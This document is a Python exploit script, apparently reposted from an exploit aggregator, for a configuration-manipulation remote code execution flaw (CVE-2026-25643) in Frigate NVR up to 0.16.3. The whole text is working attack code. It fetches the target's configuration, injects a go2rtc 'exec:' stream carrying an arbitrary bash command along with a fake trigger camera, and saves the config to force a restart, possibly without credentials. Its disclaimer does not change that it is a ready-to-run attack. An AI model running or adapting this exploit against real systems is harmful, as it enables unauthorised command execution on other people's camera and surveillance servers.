Share
## https://sploitus.com/exploit?id=PACKETSTORM:216188
#!/usr/bin/env python3
    """
    Frigate NVR โ‰ค 0.16.3 Blind RCE Exploit
    CVE-2026-25643
    
    This Python exploit targets a critical configuration manipulation vulnerability 
    in Frigate NVR versions up to 0.16.3 (both authenticated and unauthenticated paths). 
    By injecting a malicious go2rtc stream and a fake camera entry, 
    it triggers arbitrary command execution as the Frigate process during service restart โ€” 
    no reverse shell or output capture required.
    
    Author:          Joshua van der poll (https://github.com/joshuavanderpoll)
    Created:         February 2026
    Version:         1.0
    License:         GNU General Public License v3.0 (GPL-3.0)
    Disclaimer:      Use responsibly. This is a proof-of-concept for a patched
                     vulnerability (fixed in Frigate โ‰ฅ 0.16.4). Do not use against
                     systems you do not own or have explicit permission to test.
    
    Credits / References:
    - jduardo2704/CVE-2026-25643-Frigate-RCE
    
    Usage:
        python3 exploit.py -u http://target:5000 -c "touch /tmp/pwned"
        python3 exploit.py -u https://target -U admin -P password -c "id > /tmp/id.txt"
    
    """
    
    import requests
    import argparse
    import sys
    import json
    import urllib3
    import yaml
    import time
    
    # Disable SSL warnings
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    
    # Colors
    GREEN  = '\033[92m'
    YELLOW = '\033[93m'
    RED    = '\033[91m'
    BLUE   = '\033[94m'
    CYAN   = '\033[96m'
    RESET  = '\033[0m'
    
    def print_status(msg, color=BLUE, symbol="[*]"):
        print(f"{color}{symbol} {msg}{RESET}")
    
    def print_success(msg):
        print_status(msg, GREEN, "[+]")
    
    def print_warning(msg):
        print_status(msg, YELLOW, "[!]")
    
    def print_error(msg, exc=None):
        print_status(msg, RED, "[-]")
        if exc:
            print(f"    โ†’ {type(exc).__name__}: {exc}")
            import traceback
            traceback.print_exc(limit=2)
    
    def login_frigate(session, base_url, username, password):
        print_status(f"Trying to authenticate as '{username}' ...")
        try:
            resp = session.post(
                f"{base_url}/api/login",
                json={"user": username, "password": password},
                verify=False,
                timeout=12
            )
            print_status(f"Login โ†’ status code: {resp.status_code}", CYAN)
            
            if resp.status_code == 200:
                print_success("Login successful")
                return True
            else:
                print_warning(f"Login failed - status: {resp.status_code}")
                if resp.text.strip():
                    print(f"    Response: {resp.text[:180].strip()}")
                return False
                
        except Exception as e:
            print_error("Login request failed", e)
            return False
    
    def fetch_config(session, base_url):
        print_status("Fetching current configuration (/api/config/raw) ...")
        try:
            resp = session.get(f"{base_url}/api/config/raw", timeout=12, verify=False)
            print_status(f"Config fetch โ†’ HTTP {resp.status_code}", CYAN)
            
            if resp.status_code != 200:
                print_error(f"Cannot read config - status {resp.status_code}")
                if resp.text.strip():
                    print(f"    Body preview: {resp.text[:200]}")
                return None
    
            content = resp.text.strip()
            print_status(f"Received {len(content)} bytes", CYAN)
    
            # Handle possible JSON string wrapping or direct YAML
            if content.startswith('"') and content.endswith('"'):
                try:
                    content = json.loads(content)
                    print_status("Config was JSON-wrapped โ†’ unwrapped", CYAN)
                except:
                    pass
    
            try:
                config = yaml.safe_load(content)
                if not isinstance(config, dict):
                    print_error("Parsed config is not a dictionary")
                    return None
                print_success(f"Config parsed successfully ({len(config)} top-level keys)")
                return config
            except yaml.YAMLError as e:
                print_error("YAML parsing failed", e)
                print(f"    Raw content preview: {content[:300]}")
                return None
    
        except Exception as e:
            print_error("Failed to fetch/parse configuration", e)
            return None
    
    def send_config(session, base_url, config_data, save_option="restart"):
        yaml_payload = yaml.dump(config_data, allow_unicode=True, sort_keys=False)
        bytes_size = len(yaml_payload.encode())
        
        print_status(f"Sending modified config ({bytes_size:,} bytes) with option: {save_option}")
        
        try:
            resp = session.post(
                f"{base_url}/api/config/save?save_option={save_option}",
                data=yaml_payload,
                headers={"Content-Type": "text/plain"},
                timeout=10,
                verify=False
            )
            print_status(f"Config save โ†’ HTTP {resp.status_code}", CYAN)
            
            if resp.status_code in (200, 204):
                print_success("Configuration accepted (server should restart)")
            else:
                print_warning(f"Config rejected - status {resp.status_code}")
                if resp.text.strip():
                    print(f"    Server response: {resp.text[:300].strip()}")
                    
        except requests.Timeout:
            print_warning("Request timed out - server might be restarting already")
        except Exception as e:
            print_error("Failed to send modified configuration", e)
    
    def inject_command_into_config(config, command):
        print_status(f"Preparing payload โ†’ executing: {command}")
        
        payload = f"bash -c '{command}'"
        print_status(f"Using payload: {payload}", CYAN)
    
        # go2rtc โ†’ streams
        if 'go2rtc' not in config:
            config['go2rtc'] = {}
        if 'streams' not in config['go2rtc']:
            config['go2rtc']['streams'] = {}
    
        config['go2rtc']['streams']['debug_cmd'] = [f"exec:{payload}"]
        print_success("Injected malicious stream โ†’ debug_cmd")
    
        # Fake camera to trigger execution
        if 'cameras' not in config:
            config['cameras'] = {}
    
        config['cameras']['trigger_exec'] = {
            'ffmpeg': {
                'inputs': [{
                    'path': 'rtsp://127.0.0.1:8554/debug_cmd',
                    'roles': ['detect']
                }]
            },
            'detect': {'enabled': False},
            'audio':  {'enabled': False},
            'enabled': True
        }
        print_success("Injected trigger camera โ†’ trigger_exec")
    
        return config
    
    def exploit_command(base_url, username, password, command):
        session = requests.Session()
        session.verify = False
    
        # Authentication
        if username and password:
            login_frigate(session, base_url, username, password)
        else:
            print_warning("No credentials provided โ†’ attempting unauthenticated access")
    
        # Get current config
        config = fetch_config(session, base_url)
        if not config:
            print_error("Exploit aborted - cannot continue without valid config")
            sys.exit(1)
    
        # Modify config with our command
        try:
            modified_config = inject_command_into_config(config, command)
        except Exception as e:
            print_error("Failed to prepare malicious config", e)
            sys.exit(1)
    
        # Small delay
        time.sleep(1.2)
        
        # Send modified config
        send_config(session, base_url, modified_config)
    
        print("\n" + "="*60)
        print(f" {GREEN}Payload sent! Command should execute during go2rtc init / camera probe.{RESET}")
        print(" Keep in mind:")
        print(" โ€ข Output is NOT captured (blind execution)")
        print(" โ€ข Command runs as the user/frigate process")
        print(" โ€ข Multiple executions may occur during restart")
        print("="*60 + "\n")
    
    def main():
        parser = argparse.ArgumentParser(
            description="Frigate <= 0.16.3 RCE โ€“ execute blind command (CVE-2026-25643)"
        )
        parser.add_argument('-u', '--url',      required=True,  help="Target URL (http(s)://host:port)")
        parser.add_argument('-U', '--username', required=False, help="Username (optional)")
        parser.add_argument('-P', '--password', required=False, help="Password (optional)")
        parser.add_argument('-c', '--cmd',      required=True,  help="Command to execute on target")
    
        args = parser.parse_args()
    
        base_url = args.url.rstrip('/')
        print(f"\n {BLUE}Target :{RESET} {base_url}")
        if args.username:
            print(f" {BLUE}User   :{RESET} {args.username}")
        print(f" {BLUE}Command:{RESET} {args.cmd}\n")
    
        try:
            exploit_command(
                base_url=base_url,
                username=args.username,
                password=args.password,
                command=args.cmd
            )
        except KeyboardInterrupt:
            print_warning("Interrupted by user")
            sys.exit(2)
        except Exception as e:
            print_error("Unexpected fatal error", e)
            sys.exit(3)
    
    if __name__ == "__main__":
        main()